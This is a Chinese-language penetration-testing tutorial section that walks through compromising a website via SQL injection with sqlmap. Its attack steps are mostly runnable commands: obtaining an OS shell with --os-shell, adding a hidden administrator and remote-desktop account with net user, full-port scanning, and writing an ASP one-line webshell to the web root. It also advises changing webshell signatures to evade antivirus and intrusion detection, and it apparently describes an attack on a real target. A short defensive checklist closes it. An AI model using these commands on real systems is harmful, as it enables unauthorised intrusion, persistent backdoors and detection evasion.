6.8 利用sqlmap渗透某站点
6.8.1 发现并测试SQL注入漏洞
1. SQL注入漏洞发现思路
(1) 通AWVS等扫描工具对目标站点进行扫描,根据扫描结果判断是否存在注入
(2) Burpsuite抓包测试,通过手工或加载插件进行自动化测试
(3) 手工目测,整体的浏览网页对认为存在SQL注入的地方进行测试
2. 发现目标站点SQL注入点
这里一般就是看是否存在参数传递的方式提交请求,然后简单的判断确认
3. 使用sqlmap进行注入测试
6.8.2 获取webshell及提权
1. 通过sqlmap获取当前目标系统信息
sqlmap.py -u url --dbs --is-dba --user
2. 获取os-shell权限
sqlmap.py -u url --os-shell
(1) 查看3389端口
netstat -ano
(2) 添加管理员权限
net user bmfx bmfx /add
net localgroup administrators bmfx /add
net localgroup "Remote Desktop Users" bmfx /add
(3) 对目标服务器进行端口扫描
使用nmap扫描或者使用masscan进行全端口扫描
nmap -p- 192.168.1.23
masscan -p 1-65535 192.168.1.23
(4) 查看主机网络配置
ipconfig /all
3. 获取webshell
(1) 逐个查看磁盘内容
dir C:\
(2) 查看网站目录
dir E:\web
(3) 直接写入ASP的一句话
知道绝对路径直接使用echo命令写入一句话
echo ^<%execute(request("bmfx"))^%>>E:\web\www\bmfx.asp
(4) 成功获取webshell
使用菜刀连接
这里推荐下webshell管理工具,https://www.cnblogs.com/xiaozi/p/12397211.html
我个人推荐使用蚁剑和冰蝎,菜刀以后就不要使用了,因为其特征明显,容易被杀毒软件或IDS,IPS等各种安全类软件识别特征并拦截,除非你能够手动更改特征,否则就不要使用了,如果要更改特征可以参考:https://mp.weixin.qq.com/s/hbBKQRaMg-b68lJ9k8Rh4A
6.8.3 突破内网进入服务器
1. 使用Tunna等进行内网转发失败
进入到内网服务器之后一般是可以通Tunna,reGeorg等工具进行端口转发,作者这里并没成功,关于进入内网服务器之后使用到的端口转发技术,我会拿专题来讲解,内容很多,待我以后慢慢道来;目前如果想知道本节讲到的这两个工具的使用,可以在网上搜搜
2. lcx穿透内网
这里也略过,现在推荐是ew或者gost,大家感兴趣的先网上看看
6.8.4 渗透总结与防御
1. 本次渗透总结
(1) 真正的目标主机渗透成功之后,突破内网进入服务器与本地模拟环境测试还是有很大的区别,网上很多代理穿透软件和脚本在真正的环境中使用存在一定的问题,所以需要多多尝试
(2) lcx是经典的内网穿透工具,要使用它必须有自己的公网独立IP地址,这类问题直接购买云服务器即可,也就是我们常说的vps
(3) sqlmap功能强大,可以解决很多实际问题
2. 安全防御
(1) 通过公开Web漏洞扫描器对网站进行漏洞扫描,对发现的漏洞进行修复
(2) 对网站代码进行审计,修复明显的漏洞
(3) 严格控制网站脚本的权限,文件上传目录有写入权限,但是无脚本执行权限
(4) 网站应用中经理使用最少数据库账号权限,单独应用对应单独账号
(5) 在服务器上安装杀毒软件或者WAF防护软件